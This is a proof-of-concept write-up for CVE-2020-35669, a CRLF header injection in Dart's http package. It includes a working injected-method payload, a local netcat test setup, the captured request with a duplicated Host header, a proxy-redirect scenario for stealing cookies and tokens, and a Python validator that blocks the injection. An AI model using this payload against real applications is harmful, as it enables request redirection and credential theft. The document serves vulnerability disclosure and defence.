POC details: 936175a4e6d8326a2224fbcdf00b19ed0609de56

Source
Related vulnerability
Title: Google Http package for Dart injection vulnerability (CVE-2020-35669)
Description: Google Http package for Dart is an HTTP support library for the Dart programming language, maintained by Google (US). Google Http package for Dart 0.12.2 and earlier contain a security vulnerability: if an attacker controls the HTTP method and the application uses `Request` directly, CRLF injection into the outgoing HTTP request is possible.
Introduction
# [CVE-2020-35669](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35669)

## dummy server
Start the dummy server in a first terminal (OpenBSD netcat syntax; with GNU netcat use `-l -p 80`). Root is only needed because port 80 is privileged:
```bash
sudo nc -l 127.0.0.1 80 
```

## apply given diff
The diff only retargets the request from google.com to the local listener; the injected method string is left unchanged:
```diff
diff --git a/main.dart b/main.dart
index 8c78291..a46f4d0 100644
--- a/main.dart
+++ b/main.dart
@@ -4,7 +4,7 @@ import 'package:http/src/request.dart';
 void main() async {
   var r = Request(
       "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:",
-      Uri(scheme: "http", path: "/llama", host: "google.com"));
+      Uri(scheme: "http", path: "/llama", host: "localhost"));
   var rs = await r.send();
   var resp = await Response.fromStream(rs);
   print('${resp.body}');

```
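Review bot: the context line `import 'package:http/src/request.dart';` reaches into the package's private `src/` directory; import the public `package:http/http.dart` instead, which exports `Request` and `Response`, so the PoC keeps compiling when internal file layout changes. The `Uri(scheme: "http", path: "/llama", host: "localhost")` on the `+` line carries no port and therefore defaults to 80, matching the `nc` listener above; if the listener is moved to an unprivileged port, add `port:` here too.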

## run dummy app
Run `main.dart` in a second terminal:
```bash
dart run main.dart
```

## result
nc should receive the request below. Two details of the capture matter: the whole method string, including the injected `Host: example.com` line, was uppercased before being written to the socket, and dart:io still appended its own `host: localhost` header afterwards, so the request carries two Host headers and an absolute-form request target. A proxy that honours the first Host header or the absolute-form target will route the request to example.com rather than to the host given in the `Uri`.
```http
GET HTTP://EXAMPLE.COM/ HTTP/1.1
HOST: EXAMPLE.COM
LLAMA: /llama HTTP/1.1
user-agent: Dart/2.10 (dart:io)
accept-encoding: gzip
content-length: 0
host: localhost
```

### Important piece of code
```dart
  // The first argument is the HTTP method. It is written into the request
  // line without validation, so the embedded "\r\n" sequences terminate the
  // request line and turn the rest of the string into extra header lines.
  var r = Request(
      "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:",
      Uri(scheme: "http", path: "/llama", host: "google.com"));
  var rs = await r.send();
```

## Critical path

Assuming the diff shown above was not applied (the `Uri` still points at google.com) and the **user is behind a reverse proxy**, the website served by `example.com` was reached:
```bash
dart run main.dart
<!doctype html>
<html>
<head>
    <title>Example Domain</title>

    <meta charset="utf-8" />
    ...
    ... blah blah blah
    ...

```
### Why this is a security risk
If a developer uses `Request` to abstract HTTP calls and accepts the method parameter from the user, that user can perform header injection or path forgery.
This can be exploited in many ways and matters most when a reverse proxy is in place: a proxy may forward the request to any host named in the `host` header.
Suppose `example.com` in the injected string is replaced with `my-evil-uservice.org` and the victim works in a company behind such a proxy. Calls can then be redirected, together with their headers and cookies (tokens), to the attacker's host, so whole requests with all their headers and cookies can be stolen.
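The following is an added Python example and is not code from the PoC repository or from package:http. `serialize_request` is a constructed model of the wire format seen in the nc capture above (the method is uppercased and joined to the path and version with no check); `parse_request` reads the bytes back the way a proxy would, which shows the injected `Host` landing as a header ahead of the real one; `is_http_token` is the check a hardened wrapper should apply before constructing a request, restricting the method to the RFC 7230 token grammar, which contains neither CR, LF, space nor colon. `safe_serialize_request` is the hypothetical hardened form.

```python
import re

# RFC 7230 "token" character set. Anything outside it (CR, LF, space, colon,
# slash, ...) cannot be part of a method name, so a validated method can never
# end the request line early or start a new header.
_TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

# Same injected string as in the PoC's main.dart.
INJECTED_METHOD = "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:"


def is_http_token(method: str) -> bool:
    """True if `method` is a valid HTTP token per RFC 7230 section 3.2.6."""
    return _TOKEN_RE.fullmatch(method) is not None


def serialize_request(method: str, path: str, headers: dict) -> bytes:
    """Constructed model (not package:http code) of what the nc capture shows:
    the method is uppercased and concatenated into the request line unchecked,
    then the caller's headers follow."""
    lines = [f"{method.upper()} {path} HTTP/1.1"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_request(raw: bytes):
    """Parse the head of a request the way a naive proxy would: the first
    CRLF-terminated line is the request line, every following line is a
    header. Returns (request_line, [(name_lowercased, value), ...])."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    request_line, *header_lines = head.split("\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return request_line, headers


def host_headers(raw: bytes) -> list:
    """All Host header values in order; more than one means injection."""
    _, headers = parse_request(raw)
    return [value for name, value in headers if name == "host"]


def safe_serialize_request(method: str, path: str, headers: dict) -> bytes:
    """Hardened wrapper (hypothetical): refuse any method that is not a token."""
    if not is_http_token(method):
        raise ValueError(f"invalid HTTP method: {method!r}")
    return serialize_request(method, path, headers)


if __name__ == "__main__":
    raw = serialize_request(INJECTED_METHOD, "/llama", {"host": "localhost"})
    line, hdrs = parse_request(raw)
    print(line)  # request line now names example.com in absolute form
    for name, value in hdrs:
        print(f"{name}: {value}")  # two host headers, injected one first
    try:
        safe_serialize_request(INJECTED_METHOD, "/llama", {"host": "localhost"})
    except ValueError as exc:
        print("rejected:", exc)
```

Run it as a script to see the two Host headers; the hardened path rejects the method before a single byte is serialized, which is the same class of check (a token-grammar test on the method) that a fixed HTTP client library needs.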
File snapshot

```
/data/pocs/936175a4e6d8326a2224fbcdf00b19ed0609de56
├── main.dart     (376 bytes)
├── pubspec.lock  (1.8K)
├── pubspec.yaml  (98 bytes)
└── README.md     (2.2K)
0 directories, 4 files
```